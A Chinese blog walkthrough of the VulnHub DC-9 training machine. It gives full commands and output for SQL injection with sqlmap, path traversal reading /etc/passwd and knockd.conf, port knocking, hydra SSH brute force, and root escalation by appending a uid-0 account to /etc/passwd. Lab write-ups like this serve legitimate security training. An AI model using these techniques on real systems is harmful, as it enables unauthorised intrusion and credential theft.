vulnhub DC9 靶场练习

前言

这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。

虚拟机配置

这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。

在这里插入图片描述

收集信息

nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24

-sn 代表存活主机扫描,不进行端口测探。

–min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数指定的数即nmap一次至少要发多少个数据包。

–min-hostgroup 代表调整并行扫描组的大小,也就是一次性同时对多少台主机进行扫描。

更详细内容可以参考:https://zhuanlan.zhihu.com/p/322244582,关于nmap的一些性能参数的学习。

┌──(root💀kali)-[~]
└─# nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:54 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 3 hosts. Timing: About 66.67% done; ETC: 20:54 (0:00:04 remaining)
Nmap scan report for 192.168.119.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:BD:97 (VMware)
Nmap scan report for 192.168.119.172
Host is up (0.00044s latency).
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Nmap scan report for 192.168.119.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E8:75:E7 (VMware)
Nmap scan report for 192.168.119.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 12.64 seconds

发现靶机的IP地址为 192.168.119.172,然后用nmap对靶机进行详细地扫描。

nmap -A -sV -p- --min-parallelism 100 192.168.119.172

-A 代表综合性扫描,能收集很多重要的信息

-sV 代表扫描主要的服务信息

-p- 参数p是指定端口,后面的-代表所有端口。

┌──(root💀kali)-[~]
└─# nmap -A -sV -p- --min-parallelism 100 192.168.119.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:55 EDT
Nmap scan report for 192.168.119.172
Host is up (0.00068s latency).
Not shown: 65533 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.119.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.07 seconds

发现开放了 80端口,其中22端口被过滤,这里就猜测可能是靶机应用了knockd服务把22端口关闭,需要访问特定的端口序列后才会开放22端口。关于ssh保护的详细内容可以参考:https://www.cnblogs.com/rongfengliang/p/10904061.html,保护ssh的三把锁。

SQL注入漏洞

先到web上看看以寻找突破口,用浏览器打开该该网站。

在这里插入图片描述

点击导航栏上的Manage后发现了一个登陆页面,尝试一下暴力破解,没有成功。

在这里插入图片描述

点击导航栏上的Search后发现了一个输入框,首先简单判断一下这里是否存在sql注入,尝试输入1' or 1=1#,发现搜索出了很多结果。

在这里插入图片描述

然后再次输入1' or 1=2#,发现没有搜索到任何结果,说明此处存在sql注入。

在这里插入图片描述

该SQL注入点为post提交方式,所以我们可以先用burpsuite抓取在search页面提交的数据,然后右击鼠标,然后点击 Copy to file,保存为一个文件。

在这里插入图片描述

然后用sqlmap读取该文件对目标网站进行攻击。

sqlmap -l target --dump --batch

-l 代表从burpsuite保存的文件中读取攻击目标,也可以用-r参数代替。

target 是刚刚用burpsuite保存的文件的名称。

–dump 代表读取数据库中所有内容

–batch 表示自动化运行,不会给出选项供用户选择。

┌──(root💀kali)-[~/Documents/DC-9]
└─# sqlmap -l target --dump --batch
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

[21:35:48] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/Users.csv'                                                                                                    
[21:35:48] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[21:35:48] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[21:35:48] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/StaffDetails.csv'                                                                                      
[21:35:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_0935pm.csv'                   

要注意的是此处只查询出了数据库Staff中的内容。该网站还有一个名为users的数据库,该库中保存着一些账号和密码,可以在后面用来进行ssh的爆破。

现在已经获取了admin的md5加密的密文856f5de590ef37314e7c3bdf6f8a66dc,尝试在https://www.somd5.com/破解该密码。

在这里插入图片描述

现在已经获取了admin的密码transorbital1,登陆网站后台进行进一步渗透。

文件包含漏洞

登陆网站后台后发现底部有一行文字 File does not exist,估计这个页面是可以用过参数控制文件包含内容。

在这里插入图片描述

控制文件包含的参数可以尝试常用的file,include,require等常见参数,包含内容可以使用/etc/passwd来尝试,但是没有包含成功。最后改用burpsuite+字典进行爆破。

在这里插入图片描述

文件内容的字典可以使用 kali自带的字典/usr/share/wordlists/wfuzz/vulns/dirTraversal-nix.txt。字典跑完后点击Length进行排序,文件长度最长的请求应该就是文件包含成功了。

在这里插入图片描述

然后在浏览器中访问该地址,发现包含文件成功。

http://192.168.119.172/manage.php?file=../../../..//etc/passwd

在这里插入图片描述

knockd服务

猜测该靶机使用了knockd服务,首先来简单介绍一下knockd服务:当你的一个端口不想对外开放时可以通过knockd将它关闭,这样别人就无法直接访问这个端口。如果自己想访问这个端口,那么必须先按顺序访问指定的端口,并且这几步操作必须在一定时间内完成。当你在一定之间内按顺序访问了指定端口后,被关闭的端口就会对你开放一段时间。更详细的内容可以参考:https://www.cnblogs.com/rongfengliang/p/10904061.html,保护ssh的三把锁。

如果开启了knockd服务,那么会存在一个配置文件/etc/knockd.conf,该配置文件中保存着需要访问的端口顺序。我们可以通过文件包含漏洞查看该配置文件。

http://192.168.119.172/manage.php?file=../../../..//etc/knockd.conf

在这里插入图片描述

根据配置文件的显示,我们需要依次访问746984759842端口才能访问ssh服务。现在需要在本地安装 knockd程序,我们可以通过knockd程序对靶机的指定端口按顺序访问。

apt install knockd
knock 192.168.119.172 7469 8475 9842

现在可以访问靶机的22端口了,所以现在尝试对靶机的ssh密码进行爆破。

爆破ssh密码

在爆破之前需要准备好字典,在数据库的users库中存在着一些账号和密码,用sqlmap把这些信息查询出来,做成字典。

sqlmap -l target -D users --dump --batch

-D 指定需要查询的库

┌──(root💀kali)-[~/Documents/DC-9]
└─# sqlmap -l target -D users --dump --batch                                             
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[22:27:26] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/users/UserDetails.csv'                                                                                        
[22:27:26] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_1027pm.csv'                   

将所有账号保存在user.txt中,将所有密码保存在文件pass.txt中。然后使用hydra对ssh进行爆破。

hydra -L user.txt -P pass.txt  ssh://192.168.119.172

-L 指定账号文件字典,如果需要指定单个账号则使用小写的-l

-P 指定密码文件字典,如果需要指定单个密码则使用小写的-p

┌──(root💀kali)-[~/Documents/DC-9]
└─# hydra -L user.txt -P pass.txt  ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:43:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.119.172   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.119.172   login: janitor   password: Ilovepeepee
[STATUS] 363.00 tries/min, 363 tries in 00:01h, 1 to do in 00:01h, 14 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:44:26

成功获取了三个账号的密码:login: chandlerb password: UrAG0D!login: joeyt password: Passw0rdlogin: janitor password: Ilovepeepee

提权

经过测试前两个账号没有发现什么特殊文件,也无法提权。登陆janitor账号后,在文件~/.secrets-for-putin中发现了一个密码文件passwords-found-on-post-it-notes.txt

ssh janitor@192.168.119.172
cd .secrets-for-putin
cat passwords-found-on-post-it-notes.txt
┌──(root💀kali)-[~/Documents/DC-9]
└─# ssh janitor@192.168.119.172
janitor@192.168.119.172's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep  5 12:48:56 2021 from 192.168.119.130
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep  5 12:44 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep  5 12:44 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin

janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

查看这个文件中的密码,把这些密码保存在一个文件 pass2.txt中,并再次使用hydra进行ssh的爆破。

hydra -L user.txt -P pass2.txt  ssh://192.168.119.172
└─# hydra -L user.txt -P pass2.txt  ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:56:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.119.172   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:56:48

爆破出了一个新的账号密码 login: fredf password: B4-Tru3-001,登陆这个账号尝试一下提权操作。

ssh fredf@192.168.119.172
sudo -l
┌──(root💀kali)-[~/Documents/DC-9]
└─# ssh fredf@192.168.119.172  
fredf@192.168.119.172's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

发现fredf可以使用超级权限执行test,尝试着执行一下test。

/opt/devstuff/dist/test/test

执行后出现了以下内容:

fredf@dc-9:~$ /opt/devstuff/dist/test/test
Usage: python test.py read append

看这个内容猜测它的功能是追加内容到一个文件中去,最后在 /opt/devstuff中发现了一个文件 test.py,这个Python便是test的源码,查看这个源码分析test的功能与使用方法。

fredf@dc-9:/opt/devstuff/dist$ cd /opt/devstuff/
fredf@dc-9:/opt/devstuff$ ls
build  dist  __pycache__  test.py  test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$ 

查看源码发现这个程序的功能是将参数1文件内容追加到参数2文件中。所以我们可以将一个账号信息追加到 /etc/passwd中。

/etc/passwd 保存着所有账号的信息,可以通过在该文件中添加一个具有root权限的账号信息来获取root权限。

首先我们来了解一下/etc/passwd内容的格式,以root为例:

root:x:0:0:root:/root:/bin/bash

字段1: 用户名。

字段2:密码占位符,x代表有密码,也可以直接填入密码的密文。

字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。

字段4:用户的gid,也就是所属用户组的id。

字段5:用户信息(弃用)。

字段6:用户家目录。

字段7:用户登陆系统后使用的shell。

然后通过openssl生成密码密文。

openssl passwd -1 -salt rpsate rpsate

passwd 代表生成密码的密文。

-1 代表使用MD5的加密方法。

-salt 代表密码加盐。

第一个rpsate是账号,第二个rpsate是密码。

更详细的内容可以参考https://blog.csdn.net/jiajiren11/article/details/80376371,/etc/shadow中密码段的生成方式

┌──(root💀kali)-[~/Documents/DC-9]
└─# openssl passwd -1 -salt rpsate rpsate
$1$rpsate$2r3jb6WfuHP8DFRd31cUF1

所以我们将 rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash追加到 /etc/passwd即可。现将这一字符串写入一个文件中,然后再通过test程序来追加到/etc/passwd

经过测试字段6用户家目录必须加上,否则无法识别到账号。

字段2密码一栏不能为空,否则不能认证成功,上面字段2是密码rpsate加密后的密文。

echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
fredf@dc-9:/opt/devstuff$ sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ tail /etc/passwd
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash

发现现在已经将rpsate账号信息写入了/etc/passwd,现在可以跳转到具有root权限的账号rpsate了。

su rpsate
cat /root/theflag.txt
fredf@dc-9:/opt/devstuff$ su rpsate
Password: 
root@dc-9:/opt/devstuff# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/opt/devstuff# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt 


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

提权成功!

参考文献

[1] https://zhuanlan.zhihu.com/p/322244582,关于nmap的一些性能参数的学习。

[2] https://zhuanlan.zhihu.com/p/112172905,vulnHub-DC9

[3] https://www.cnblogs.com/rongfengliang/p/10904061.html,保护 SSH 的三把锁

[4] https://blog.csdn.net/jiajiren11/article/details/80376371,/etc/shadow中密码段的生成方式

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rpsate

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值